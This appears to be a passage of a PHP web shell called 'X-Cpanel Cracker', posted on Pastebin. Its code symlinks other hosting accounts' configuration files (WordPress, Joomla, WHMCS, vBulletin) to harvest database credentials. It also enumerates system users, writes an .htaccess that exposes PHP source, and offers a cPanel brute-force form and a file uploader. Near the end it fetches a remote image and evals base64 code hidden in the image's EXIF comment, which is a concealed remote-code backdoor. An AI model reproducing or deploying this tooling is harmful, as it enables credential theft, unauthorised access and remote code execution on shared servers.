  498. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  499. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  500. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  501. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  502. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  503. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  504. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  505. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  506. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  507. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  508. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  509. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  510. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  511. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  512. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  513. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  514. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  515. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  516. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  517. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  518. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  519. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  520. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  521. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  522. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  523. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  524. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  525. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  526. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  527. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  528. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  529. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  530. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  531. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  532. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  533. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  534. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  535. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  536. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  537. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  538. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  539. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  540. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  541. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  542. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  543. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  544. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  545. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  546. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  547. }
  548.  
  549. $d0mains = @file("/etc/named.conf");
  550.  
  551. if($d0mains)
  552. {
  553. mkdir($fn);
  554. chdir($fn);
  555.  
  556. foreach($d0mains as $d0main)
  557. {
  558. if(eregi("zone",$d0main))
  559. {
  560. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  561. flush();
  562.  
  563. if(strlen(trim($domains[1][0])) > 2)
  564. {
  565. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  566.  
  567. syml($user['name'],$domains[1][0]);
  568. }
  569. }
  570. }
  571. echo "<center><font color=lime size=3>[ Done ]</font></center>";
  572. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
  573. }
  574. else
  575. {
  576. mkdir($fn);
  577. chdir($fn);
  578. $temp = "";
  579. $val1 = 0;
  580. $val2 = 1000;
  581. for(;$val1 <= $val2;$val1++)
  582. {
  583. $uid = @posix_getpwuid($val1);
  584. if ($uid)
  585. $temp .= join(':',$uid)."\n";
  586. }
  587. echo '<br/>';
  588. $temp = trim($temp);
  589.  
  590. $file5 = fopen("test.txt","w");
  591. fputs($file5,$temp);
  592. fclose($file5);
  593.  
  594. $htaccess =
  595. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  596. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  597. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  598. ';
  599. $file = fopen(".htaccess","w+");
  600. $write = fwrite ($file ,base64_decode($htaccess));
  601.  
  602. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  603. while(!feof($file))
  604. {
  605. $s = fgets($file);
  606. $matches = array();
  607. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  608. $matches = str_replace("home/","",$matches[1]);
  609. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  610. continue;
  611. syml($matches,$matches);
  612. }
  613. fclose($file);
  614. echo "</table>";
  615. unlink("test.txt");
  616. echo "<center><font color=lime size=3>[ Done ]</font></center>";
  617. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
  618. }
  619. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."><< BACK</a>";
  620. exit;
  621. }
  622. ?>
  623. <form method="POST" target="_blank">
  624. <strong>
  625. <input name="page" type="hidden" value="find"><table>
  626. </strong><br><br><center><font size="3" align="center" style="italic" color="#00ff00">+--=[ Cpanel BruteForce ]=--+</font></center><br>
  627. <table width="600" border="0" class="tabnet" cellpadding="3" cellspacing="1" align="center">
  628. <tr>
  629. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  630. <center><b><font size="3" style="italic" color="#00ff00">[ Cpanel Brute Force ]</font></b></center></td></tr>
  631. <tr>
  632. <td>
  633. <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  634. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  635. <strong>Username List :</strong></td>
  636. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
  637. </tr>
  638. <tr>
  639. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  640. <strong>Password List :</strong></td>
  641. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
  642. </tr>
  643. <tr>
  644. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  645. <strong>Type :</strong></td>
  646. <td valign="top" bgcolor="#151515" colspan="5">
  647. <span class="style2"><strong>Simple : </strong> </span>
  648. <strong>
  649. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  650. <font class="style2"><strong>/etc/passwd : </strong> </font>
  651. <strong>
  652. <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  653. </strong>
  654. </span>
  655. </td>
  656. </tr>
  657. <tr>
  658. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  659. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="Start">
  660. </strong>
  661. </td>
  662. <tr>
  663. </form>
  664. <tr>
  665. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong>[ Get Config ]</strong></center></td>
  666. </tr>
  667. <form method="POST" target="_blank">
  668. <strong>
  669. <input name="mendapatkan" type="hidden" value="passwd">
  670. </strong>
  671. <tr>
  672. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
  673. <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="50" name="foldername" type="text"></strong></td>
  674. </strong>
  675. </td>
  676. </tr>
  677. <tr>
  678. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  679. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  680. </strong>
  681. </td>
  682. <tr>
  683. </form>
  684. <tr>
  685. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong>[ Get Wordlist ]</strong></center></td>
  686. </tr>
  687. <form method="POST" target="_blank">
  688. <strong>
  689. <input name="pass" type="hidden" value="password">
  690. </strong>
  691. <tr>
  692. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
  693. <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="50" name="url" type="text" value="http://www."></strong></td>
  694. </strong>
  695. </td>
  696. </tr>
  697. <tr>
  698. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  699. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  700. </strong>
  701. </td>
  702. <tr>
  703. </form>
  704. <tr>
  705. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong>[ Info
  706. Security ]</strong></center></td>
  707. </tr>
  708. <tr>
  709. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  710. <td valign="top" bgcolor="#151515" colspan="5">
  711. <strong>
  712. <?php
  713. $safe_mode = ini_get('safe_mode');
  714. if($safe_mode=='1')
  715. {
  716. echo 'ON';
  717. }else{
  718. echo 'OFF';
  719. }
  720.  
  721. ?>
  722. </strong>
  723. </td>
  724. </tr>
  725. <tr>
  726. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
  727. <td valign="top" bgcolor="#151515" colspan="5">
  728. <strong>
  729. <form method="POST" target="_blank">
  730. <strong>
  731. <input name="matikan" type="hidden" value="sekatan">
  732. </strong>
  733.  
  734. <?php
  735. if(''==($func=@ini_get('disable_functions')))
  736. {
  737. echo "<font color=#00ff00>No Security for Function</font></b>";
  738. }else{
  739. echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
  740. echo "<font color=red>$func</font></b>";
  741. echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
  742. echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
  743. </strong>
  744. </td></tr>';
  745. }
  746. ?></strong></td></tr></table></table></table>
  747. <?
  748. break;
  749.  
  750. #########################bds
  751.  
  752. case '':
  753.  
  754. ?><?php
  755.  
  756. break;
  757.  
  758.  
  759. // Uploader
  760. case 'uploader':
  761.  
  762. echo '<center><b>+--=[ Uploader ]=--+</b><br><br><br><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  763. echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>';
  764. if( $_POST['_upl'] == "Upload" ) {
  765. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<p align="center"><font face="Verdana"
  766.  
  767. size="1"><font color="white"> Done !!</font><br>'; }
  768. else { echo '<font color="#FF0000">Failed :( </font></p>
  769. </td></table></tr>
  770.  
  771. '; }
  772. }
  773. break;
  774.  
  775. }}
  776. ?><br><br><br><center><form action='' method='post'>
  777. <table class='tabnet' style='width:650px;' border=''>
  778. <th colspan=10>Security Info</th><tr>
  779. <td>System </td>
  780. <td><?php
  781. echo php_uname();?></td>
  782. </tr>
  783. <tr>
  784. <td valign="top" bgcolor="" style="width: 139px">Safe Mode</td>
  785. <td valign="top" bgcolor="" colspan="5">
  786. <?php
  787. $safe_mode = ini_get('safe_mode');
  788. if($safe_mode=='1')
  789. {
  790. echo 'ON';
  791. }else{
  792. echo 'OFF';
  793. }
  794.  
  795. ?>
  796. </td>
  797. </tr>
  798. <tr>
  799. <td valign="top" bgcolor="" style="width: 139px">Desible Function</td>
  800. <td valign="top" bgcolor="" colspan="5">
  801.  
  802. <form method="POST" target="_blank">
  803.  
  804. <input name="matikan" type="hidden" value="sekatan">
  805.  
  806.  
  807. <?php
  808. if(''==($func=@ini_get('disable_functions')))
  809. {
  810. echo "<font color=#00ff00>No Security for Function</font></b>";
  811. }else{
  812. echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
  813. echo "<font color=red>$func</font></b>";
  814. echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
  815. echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
  816. </td></tr>';
  817. }
  818. ?><tr>
  819. <?php
  820. $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
  821. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  822. ?>
  823. </table></form></center>
  824. <center><br><br><b><div class="info">-=[ X-Cpanel Cracker by <span class="gaya"><a href="http://facebook.com/Muhammad.anwar.karashi">IST</a></span> ]=-</div>
  825. <div class="jaya"> &copy; 2013 R4ST4_R00T ( indonesian Security Tester )</div></center></b><br><br>
  826.  
  827. </body></html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!